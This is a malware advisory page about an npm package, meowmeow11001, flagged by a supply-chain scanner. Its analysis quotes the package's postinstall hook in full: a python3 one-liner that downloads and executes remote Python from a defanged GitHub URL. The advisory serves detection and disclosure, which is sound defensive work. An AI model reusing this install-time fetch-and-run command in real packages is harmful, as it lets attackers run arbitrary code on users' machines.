LWA-2026-3958 confirmed malware

meowmeow11001@1.0.0

Malicious code in meowmeow11001 (npm)

T1195.002 · Compromise Software Supply ChainT1059.006 · PythonT1105 · Ingress Tool Transfer

Analysis

A bare delivery vehicle (package.json only, ~306 bytes, no readme or license) whose postinstall hook runs python3 -c "import urllib.request,os; exec(urllib.request.urlopen('hxxps://raw[.]githubusercontent[.]com/ganjanuss3521/meowww/refs/heads/main/meow[.]py').read())" — fetching and executing arbitrary Python from a GitHub-hosted URL at install time. A classic lifecycle-downloader whose second-stage payload likely handles token theft or persistence.

analyzed by
Leitwacht
first seen
Jun 10, 2026, 03:44 PM
analyzed
Jun 10, 2026, 03:45 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.